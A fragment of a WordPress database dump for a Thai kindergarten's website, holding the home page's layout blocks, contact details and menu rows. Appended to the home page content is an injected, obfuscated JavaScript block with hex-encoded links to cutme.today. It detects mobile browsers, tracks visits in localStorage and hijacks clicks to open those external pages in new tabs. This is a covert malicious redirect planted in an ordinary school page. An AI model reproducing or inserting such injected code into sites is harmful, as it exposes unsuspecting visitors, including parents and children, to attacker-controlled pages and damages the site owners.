{\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','publish','closed','closed','','%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b9%81%e0%b8%a3%e0%b8%81','','','2025-11-13 11:56:32','2025-11-13 04:56:32','',0,'http://watprato.ssk.in.th/?page_id=19',0,'page','',0),
(20,1,'2024-07-27 20:45:17','2024-07-27 13:45:17','','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 20:45:17','2024-07-27 13:45:17','',19,'http://watprato.ssk.in.th/?p=20',0,'revision','',0),
(26,1,'2025-06-27 15:07:02','2024-07-27 13:49:48',' ','','','publish','closed','closed','','26','','','2025-06-27 15:07:02','2025-06-27 08:07:02','',0,'http://watprato.ssk.in.th/?p=26',1,'nav_menu_item','',0),
(35,1,'2025-06-27 15:07:02','2024-07-27 13:53:44','','เกี่ยวกับโรงเรียน','','publish','closed','closed','','%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%a7%e0%b8%81%e0%b8%b1%e0%b8%9a%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2025-06-27 15:07:02','2025-06-27 08:07:02','',0,'http://watprato.ssk.in.th/?p=35',2,'nav_menu_item','',0),
(36,1,'2025-06-27 15:07:02','2024-07-27 13:53:44','','บุคลากร','','publish','closed','closed','','%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3','','','2025-06-27 15:07:02','2025-06-27 08:07:02','',0,'http://watprato.ssk.in.th/?p=36',3,'nav_menu_item','',0),
(37,1,'2025-06-27 15:07:02','2024-07-27 13:53:44','','หลักสูตร','','publish','closed','closed','','%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3','','','2025-06-27 15:07:02','2025-06-27 08:07:02','',0,'http://watprato.ssk.in.th/?p=37',4,'nav_menu_item','',0),
(38,1,'2025-06-27 15:07:02','2024-07-27 13:53:44','','ระบบบริการ','','publish','closed','closed','','%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2025-06-27 15:07:02','2025-06-27 08:07:02','',0,'http://watprato.ssk.in.th/?p=38',5,'nav_menu_item','',0),
(39,1,'2025-06-27 15:07:02','2024-07-27 13:53:44','','ติดต่อเรา','','publish','closed','closed','','%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%a3%e0%b8%b2','','','2025-06-27 15:07:02','2025-06-27 08:07:02','',0,'http://watprato.ssk.in.th/?p=39',6,'nav_menu_item','',0),
(40,1,'2024-07-27 20:54:31','2024-07-27 13:54:31','','434878811_122134783502202781_1764078122862278595_n','','inherit','open','closed','','434878811_122134783502202781_1764078122862278595_n','','','2024-07-27 20:54:31','2024-07-27 13:54:31','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg',0,'attachment','image/jpeg',0),
